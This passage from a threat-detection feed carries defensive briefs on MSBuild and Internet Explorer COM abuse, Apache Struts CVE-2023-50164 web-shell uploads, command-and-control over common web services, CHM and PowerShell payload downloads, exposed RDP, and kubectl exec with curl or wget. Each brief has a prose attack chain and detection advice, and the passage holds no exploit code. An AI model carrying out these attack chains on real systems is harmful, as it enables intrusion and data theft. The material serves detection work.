data breaches, system instability, and further propagation of malware within the network. Successful exploitation can result in sensitive information being stolen, disruption of services, and potential financial losses. This activity can be difficult to detect without specific monitoring rules and can lead to extended dwell time for attackers within the compromised environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMSBuild Making Outbound Network Connection\u003c/code\u003e to your SIEM to detect suspicious network connections initiated by MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the destination IP addresses and the content of the network traffic.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances of MsBuild.exe executing unusual or suspicious project files.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line argument logging to identify potential malicious project files being passed to MsBuild.exe.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of MsBuild.exe to authorized users and processes only.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains and IP addresses associated with command and control activity at the firewall or DNS resolver.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-09-msbuild-network-connections/","summary":"MsBuild.exe making outbound network connections may indicate adversarial activity as attackers leverage MsBuild to execute code and evade detection.","title":"MSBuild Making Network Connections Indicating Potential Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-09-msbuild-network-connections/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2023-50164"}],"_cs_exploited":false,"_cs_products":["Struts 2"],"_cs_severities":["high"],"_cs_tags":["apache-struts","webshell","cve-2023-50164","initial-access","persistence","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Apache"],"content_html":"\u003cp\u003eCVE-2023-50164 is a critical path traversal vulnerability affecting Apache Struts 2 versions prior to 2.5.33 or 6.3.0.2. The vulnerability resides in the file upload functionality, allowing attackers to manipulate file upload parameters and write malicious files, such as JSP web shells, to arbitrary locations on the web server. Successful exploitation leads to remote code execution. Detection focuses on correlating suspicious file upload requests to Struts endpoints with subsequent creation of JSP files in web-accessible directories, indicating successful exploitation. The attack involves crafting malicious multipart/form-data POST requests with WebKitFormBoundary to Struts .action upload endpoints.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a malicious HTTP POST request to a vulnerable Apache Struts endpoint (e.g., \u003ccode\u003e*.action\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe HTTP POST request contains a \u003ccode\u003emultipart/form-data\u003c/code\u003e content type with a \u003ccode\u003eWebKitFormBoundary\u003c/code\u003e string.\u003c/li\u003e\n\u003cli\u003eThe request exploits CVE-2023-50164, leveraging a path traversal vulnerability in the file upload process.\u003c/li\u003e\n\u003cli\u003eThe attacker bypasses security controls due to the path traversal vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a malicious JSP file (web shell) to a web-accessible directory, such as Tomcat\u0026rsquo;s \u003ccode\u003ewebapps\u003c/code\u003e directory.\u003c/li\u003e\n\u003cli\u003eA Java process (e.g., Tomcat) creates the JSP web shell file in the webapps directory.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses the deployed web shell via HTTP.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary commands on the server through the web shell.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2023-50164 allows attackers to achieve remote code execution on the affected server. This can lead to complete system compromise, data exfiltration, deployment of malware, and lateral movement within the network. The vulnerability affects Apache Struts 2 applications using the file upload feature, potentially impacting numerous organizations across various sectors using the framework.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Apache Struts CVE-2023-50164 Webshell Creation\u0026rdquo; to detect JSP file creation events in webapps directories following suspicious POST requests as described in the overview.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Apache Struts CVE-2023-50164 Suspicious POST Request\u0026rdquo; to detect suspicious POST requests to Struts endpoints with \u003ccode\u003emultipart/form-data\u003c/code\u003e content containing \u003ccode\u003eWebKitFormBoundary\u003c/code\u003e, as indicated in the Attack Chain.\u003c/li\u003e\n\u003cli\u003ePatch Apache Struts 2 to version 2.5.33, 6.3.0.2, or higher to remediate the CVE-2023-50164 vulnerability, as noted in the References.\u003c/li\u003e\n\u003cli\u003eEnable HTTP request body capture in network traffic monitoring tools to detect the multipart/form-data content containing WebKitFormBoundary indicators, as required by the rule setup.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-05T18:22:00Z","date_published":"2024-01-05T18:22:00Z","id":"/briefs/2024-01-apache-struts-cve-2023-50164-webshell/","summary":"Exploitation of CVE-2023-50164, a critical path traversal vulnerability in Apache Struts 2, is detected by identifying malicious multipart/form-data POST requests with WebKitFormBoundary targeting Struts .action upload endpoints, followed by JSP web shell creation in Tomcat's webapps directories, indicating remote code execution.","title":"Apache Struts CVE-2023-50164 Exploitation Leading to Web Shell Deployment","url":"https://feed.craftedsignal.io/briefs/2024-01-apache-struts-cve-2023-50164-webshell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["OneDrive","Chrome","Brave","Opera","Discord","Slack","Microsoft 365","SharePoint"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","windows","threat-detection"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Google","Brave Software","Opera","Discord","Slack"],"content_html":"\u003cp\u003eAdversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. This detection focuses on identifying connections from Windows hosts to a predefined list of commonly abused web services from processes running outside of typical program installation directories, indicating a potential C2 channel leveraging legitimate services. The rule aims to detect this behavior by monitoring network connections and DNS requests originating from unusual locations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is achieved via an unknown method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eMalware is installed on the victim\u0026rsquo;s system, likely outside typical program directories.\u003c/li\u003e\n\u003cli\u003eThe malware establishes a DNS connection to a commonly abused web service (e.g., pastebin.com, raw.githubusercontent.com) to obscure C2 traffic.\u003c/li\u003e\n\u003cli\u003eThe malware sends encrypted or encoded commands to the web service.\u003c/li\u003e\n\u003cli\u003eThe web service acts as an intermediary, relaying the commands to the attacker\u0026rsquo;s C2 server.\u003c/li\u003e\n\u003cli\u003eThe C2 server responds with instructions, which are then relayed back to the compromised host through the same web service.\u003c/li\u003e\n\u003cli\u003eThe malware executes the received commands, potentially leading to data exfiltration, lateral movement, or other malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and control over the compromised system using the web service as a hidden C2 channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to data theft, system compromise, and further propagation within the network. Since commonly used web services are utilized, the malicious activity can blend in with legitimate network traffic, making it difficult to detect. The impact can range from minor data breaches to complete network compromise, depending on the attacker\u0026rsquo;s objectives and the level of access gained.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Commonly Abused Web Services via DNS\u003c/code\u003e to your SIEM to identify suspicious DNS queries to known C2 web services originating from anomalous processes.\u003c/li\u003e\n\u003cli\u003eEnable DNS query logging on Windows endpoints to provide the data source required for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eReview network connection logs for processes outside standard installation directories communicating with domains listed in the \u003ccode\u003equery\u003c/code\u003e section of the Sigma rule to identify potential C2 activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of compromised hosts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-04-c2-web-services/","summary":"This rule detects command and control activity using common web services by identifying Windows hosts making DNS requests to a list of commonly abused web services from processes outside of known program locations, potentially indicating adversaries attempting to blend malicious traffic with legitimate network activity.","title":"Detection of Command and Control Activity via Commonly Abused Web Services","url":"https://feed.craftedsignal.io/briefs/2024-01-04-c2-web-services/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Internet Explorer"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","com","iexplore","windows"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies potential command and control (C2) activity abusing Internet Explorer (iexplore.exe) via the Component Object Model (COM) on Windows systems. The technique involves launching iexplore.exe through COM, often using system binaries like \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e to proxy the execution and evade security controls. The rule focuses on identifying unusual DNS queries originating from iexplore.exe, excluding those directed towards common Microsoft and OCSP-related domains. This tactic allows adversaries to make network connections appearing benign while hosting malicious content or performing C2 functions. The rule is designed for environments using Elastic Defend. The rule was last updated on 2026/05/04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAdversary gains initial access to the targeted system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe adversary uses \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e to load \u003ccode\u003eIEProxy.dll\u003c/code\u003e, which is used to instantiate Internet Explorer via COM.\u003c/li\u003e\n\u003cli\u003eIexplore.exe is launched as a child process of \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e with the \u003ccode\u003e-Embedding\u003c/code\u003e flag, indicating it was started via COM.\u003c/li\u003e\n\u003cli\u003eIexplore.exe initiates DNS queries to resolve domains for command and control communication or to retrieve malicious payloads.\u003c/li\u003e\n\u003cli\u003eThe DNS queries bypass typical whitelists by using uncommon or attacker-controlled domains.\u003c/li\u003e\n\u003cli\u003eIexplore.exe establishes network connections to external IP addresses associated with the malicious domains.\u003c/li\u003e\n\u003cli\u003eData is exfiltrated or further commands are received through the established connections.\u003c/li\u003e\n\u003cli\u003eThe adversary maintains persistence and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows adversaries to establish a covert command and control channel, potentially leading to data theft, system compromise, or further propagation within the network. The use of Internet Explorer, a trusted system binary, helps evade detection and bypass host-based firewalls. The impact can range from individual workstation compromise to broader network breaches, depending on the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePotential Command and Control via Internet Explorer\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent processes (\u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e) and the destination domains of the DNS queries.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for instances of \u003ccode\u003eiexplore.exe\u003c/code\u003e being launched with the \u003ccode\u003e-Embedding\u003c/code\u003e flag, especially when the parent process is \u003ccode\u003erundll32.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eReview network connection logs for \u003ccode\u003eiexplore.exe\u003c/code\u003e to identify any unusual or suspicious outbound connections to domains not associated with standard Microsoft services or internal resources.\u003c/li\u003e\n\u003cli\u003eImplement network-level controls to block communication with any identified malicious domains.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:12:00Z","date_published":"2024-01-03T18:12:00Z","id":"/briefs/2024-01-iexplore-com-c2/","summary":"This rule detects potential command and control activity where Internet Explorer (iexplore.exe) is started via the Component Object Model (COM) and makes unusual network connections, indicating adversaries might exploit Internet Explorer via COM to evade detection and bypass host-based firewall restrictions.","title":"Potential Command and Control via Internet Explorer COM Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-iexplore-com-c2/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HTML Help"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","command-and-control","malicious-file","html-help"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAdversaries may conceal malicious code in a compiled HTML file (.chm) and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe). Attackers can use CHM files to proxy the execution of malicious payloads via a signed binary to bypass security controls, and also to gain initial access to environments via social engineering methods. This rule identifies network connections done by hh.exe, which can potentially indicate abuse to download malicious files or tooling, or masquerading. The detection logic focuses on network connections originating from hh.exe to external IPs, excluding private or reserved IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a compiled HTML file (.chm), often through social engineering tactics such as phishing.\u003c/li\u003e\n\u003cli\u003eThe user opens the .chm file, which is then executed by the HTML Help executable (hh.exe).\u003c/li\u003e\n\u003cli\u003eThe hh.exe process loads and renders the HTML content within the .chm file.\u003c/li\u003e\n\u003cli\u003eEmbedded within the HTML content is malicious JavaScript or other scripting code.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes, initiating a network connection via hh.exe to an external server.\u003c/li\u003e\n\u003cli\u003eThe external server hosts a malicious payload, such as a reverse shell or an executable file.\u003c/li\u003e\n\u003cli\u003eHh.exe downloads the malicious payload to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, granting the attacker initial access or performing other malicious actions like data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to initial access to a victim\u0026rsquo;s system, potentially bypassing security controls through a signed Microsoft binary. This can result in the download and execution of arbitrary payloads, leading to data exfiltration, lateral movement within the network, or installation of malware. The exploitation can spread rapidly through social engineering, affecting multiple users within an organization. While the severity is rated as medium, the potential for escalation to a critical compromise is high if the attacker gains a foothold in the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process and network monitoring on Windows endpoints, focusing on hh.exe activity (Data Source: Elastic Defend, Sysmon, SentinelOne).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNetwork Connection via Compiled HTML File\u003c/code\u003e to your SIEM and tune for your environment to detect suspicious network connections initiated by hh.exe.\u003c/li\u003e\n\u003cli\u003eMonitor for hh.exe spawning child processes, which could indicate the execution of downloaded payloads. Create a Sigma rule to detect such events.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised host and restrict lateral movement.\u003c/li\u003e\n\u003cli\u003eConduct regular security awareness training to educate users about the risks of opening unsolicited .chm files.\u003c/li\u003e\n\u003cli\u003eInspect the digital signatures of hh.exe and other system binaries to ensure their integrity and authenticity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-hh-exe-network-connection/","summary":"This rule detects network connections initiated by hh.exe, the HTML Help executable, which may indicate the execution of malicious code embedded in compiled HTML files (.chm) to deliver malicious payloads, bypass security controls, and gain initial access via social engineering.","title":"Network Connection via Compiled HTML File","url":"https://feed.craftedsignal.io/briefs/2024-01-hh-exe-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["PowerShell"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","file-download","powershell","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers frequently use PowerShell, a legitimate administration tool, to download malicious payloads into compromised systems. This technique allows them to bypass traditional security measures by leveraging a trusted tool. This activity often occurs during the command and control phase, where attackers introduce additional tooling or malware for further exploitation. This rule identifies instances where PowerShell downloads executable and script files from untrusted remote destinations. It does this by correlating network and file events, specifically looking for PowerShell processes initiating network connections to non-whitelisted domains followed by the creation of executable or script files. The rule helps defenders identify and respond to potential command and control activity and malware deployment attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell (powershell.exe, pwsh.exe, or powershell_ise.exe) to initiate a network connection to a remote domain.\u003c/li\u003e\n\u003cli\u003eThe DNS request is made to a domain not in the allowed list (e.g., not *.microsoft.com, *.azureedge.net, etc.).\u003c/li\u003e\n\u003cli\u003ePowerShell downloads a file with an executable extension (e.g., .exe, .dll, .ps1, .bat) or a file with a MZ header.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe file is saved to a location that is not excluded by the rule, filtering out commonly used temporary directories.\u003c/li\u003e\n\u003cli\u003eThe downloaded executable or script is then executed, leading to further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence, lateral movement, or data exfiltration depending on the downloaded payload.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the introduction of malware, backdoors, or other malicious tools into the compromised system. This can enable attackers to perform a wide range of malicious activities, including data theft, system compromise, and further propagation within the network. The compromised system can become a beachhead for further attacks, potentially impacting numerous systems and leading to significant financial and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePowerShell Remote File Download\u003c/code\u003e to detect PowerShell processes downloading executable files from untrusted remote destinations by correlating network and file creation events.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend to provide the necessary network and file event data for the rule to function correctly as noted in the \u003ca href=\"https://ela.st/install-elastic-defend\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent process of the PowerShell process, the reputation of the downloaded file, and any other suspicious activities on the affected host, as per the investigation guide in the rule\u0026rsquo;s \u003ccode\u003enote\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eReview and customize the whitelisted domains in the Sigma rule to match your organization\u0026rsquo;s specific environment and trusted external resources, as described in the \u003ccode\u003equery\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eBlock the identified malicious domains or IP addresses at the network perimeter to prevent further downloads.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:25:00Z","date_published":"2024-01-03T15:25:00Z","id":"/briefs/2024-01-remote-file-download-powershell/","summary":"Detects PowerShell being used to download executable files from untrusted remote destinations, a common technique for attackers to introduce tooling or malware into a compromised environment.","title":"Remote File Download via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-file-download-powershell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","OneDrive","Chrome","Opera","Fiddler","PowerToys","Vivaldi","Zen Browser","WaveBrowser","MicrosoftEdgeCP"],"_cs_severities":["low"],"_cs_tags":["command-and-control","webservice","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Google","BraveSoftware","Opera","Vivaldi","Wavesor Software","Discord","Telegram","Facebook","Trello","GitHub","Supabase"],"content_html":"\u003cp\u003eThis detection rule, sourced from Elastic, identifies potential command and control (C2) activity by detecting connections to commonly abused web services. Adversaries often leverage popular web services like pastebin, GitHub, Dropbox, and Discord to mask malicious communications within legitimate network traffic. This technique makes it challenging for defenders to distinguish between normal user activity and malicious C2 traffic. The rule focuses on Windows systems and monitors DNS queries to identify processes communicating with a predefined list of services known to be abused by attackers. The rule was last updated on 2026-05-04 and is designed to work with data from Elastic Defend and SentinelOne Cloud Funnel. The goal is to identify anomalous network connections originating from unusual processes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user on a Windows host unknowingly executes a malicious file (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe malicious file executes a process outside of typical program directories (e.g., \u003ccode\u003eC:\\Windows\\Temp\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThis process initiates a DNS query to a domain associated with a commonly abused web service (e.g., \u003ccode\u003epastebin.com\u003c/code\u003e, \u003ccode\u003egithubusercontent.com\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe DNS query resolves to an IP address, and a network connection is established to the web service.\u003c/li\u003e\n\u003cli\u003eThe malicious process uploads or downloads data from the web service, potentially containing commands for the compromised host or exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe web service acts as an intermediary, relaying commands from the attacker to the compromised host or exfiltrated data from the compromised host to the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to perform further actions on the compromised host, such as lateral movement or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack using common web services for C2 can lead to data exfiltration, system compromise, and further propagation within the network. The low severity suggests a focus on detecting early-stage C2 activity, which if left unchecked, could escalate into a significant incident. The usage of popular web services makes detection difficult, requiring careful analysis and tuning to avoid false positives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Connection to Commonly Abused Web Services\u0026rdquo; to your SIEM and tune it for your environment to minimize false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS query logging to accurately capture DNS requests for improved detection capabilities, activating the \u0026ldquo;DNS Query to Commonly Abused Web Services\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the process execution chain and network connections to determine the legitimacy of the activity, referencing the investigation steps described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eReview and update the list of excluded processes in the Sigma rule to reflect your organization\u0026rsquo;s approved software and reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-common-web-services-c2/","summary":"This rule detects command and control (C2) communications that use common web services to hide malicious activity on Windows hosts by identifying network connections to commonly abused web services from processes outside of known legitimate program locations, indicating potential exfiltration or C2 activity blended with legitimate traffic.","title":"Detection of Command and Control Activity via Common Web Services","url":"https://feed.craftedsignal.io/briefs/2024-01-common-web-services-c2/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2019-0708"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["command-and-control","lateral-movement","initial-access","rdp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eRemote Desktop Protocol (RDP) is a common tool for system administrators to remotely manage systems, however, exposing RDP directly to the internet creates a significant attack surface. Threat actors frequently target and exploit RDP for initial access, lateral movement, and establishing backdoors within compromised networks. This activity is detected by monitoring network traffic for RDP connections originating from outside the internal network (RFC1918 IP ranges). This is important because successful RDP compromise often leads to broader network infiltration and data exfiltration. This detection focuses on the network level characteristics of RDP connections from the internet to internal assets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a publicly accessible RDP service.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to brute-force RDP login credentials or exploits a known RDP vulnerability (e.g. BlueKeep CVE-2019-0708).\u003c/li\u003e\n\u003cli\u003eUpon successful authentication or exploitation, the attacker gains remote access to the targeted system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a pivot point to perform reconnaissance on the internal network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally within the network using stolen credentials or by exploiting other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or establishes persistence mechanisms (e.g., creating new user accounts or modifying system configurations).\u003c/li\u003e\n\u003cli\u003eThe attacker gathers sensitive data from internal systems.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the stolen data to an external server or deploys ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised RDP services can lead to significant data breaches, system downtime, and financial losses. Attackers can leverage RDP access to steal sensitive information, install ransomware, or disrupt critical business operations. While the number of affected organizations varies, RDP exploitation remains a prevalent attack vector, especially for organizations with inadequate security practices. The impact of a successful RDP attack ranges from several thousands to millions of dollars, depending on the size of the organization and the sensitivity of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;RDP (Remote Desktop Protocol) from the Internet\u0026rdquo; Sigma rule to your SIEM to detect unauthorized RDP connections from outside the network.\u003c/li\u003e\n\u003cli\u003eReview firewall rules and network configurations to ensure RDP services are not exposed directly to the internet. Implement a VPN or RDP gateway for secure remote access.\u003c/li\u003e\n\u003cli\u003eEnable and monitor network traffic logs (category: \u003ccode\u003enetwork_traffic\u003c/code\u003e, product: \u003ccode\u003ewindows|linux|macos\u003c/code\u003e) to provide data for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the source IP address and user accounts involved in the RDP connection.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of a potential RDP compromise.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-rdp-internet/","summary":"This rule detects network events indicative of RDP traffic originating from the internet, which poses a significant security risk due to its frequent exploitation as an initial access or backdoor vector.","title":"RDP (Remote Desktop Protocol) from the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-rdp-internet/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","execution","command and control","threat detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious activity within Kubernetes environments where attackers leverage \u003ccode\u003ekubectl exec\u003c/code\u003e or similar API calls to execute commands within pods. Specifically, it focuses on instances where these commands involve using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target pod within the cluster to execute commands within.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or a similar API call to initiate a shell session within the target pod.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a command using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download a malicious script, tool, or exfiltrate data over HTTPS. The URL is often encoded in the requestURI.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes API server records the exec call and its parameters in the audit logs.\u003c/li\u003e\n\u003cli\u003eThe detection rule decodes the requestURI, extracts the command string, and identifies the use of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e with an HTTPS URL.\u003c/li\u003e\n\u003cli\u003eThe rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.\u003c/li\u003e\n\u003cli\u003eIf the command is identified as malicious, an alert is triggered, indicating a potential compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks.  Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. The scope of impact depends on the permissions granted to the compromised pod and the attacker\u0026rsquo;s objectives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Kubernetes Pod Exec with Curl or Wget to HTTPS\u0026rdquo; to your SIEM and tune for your 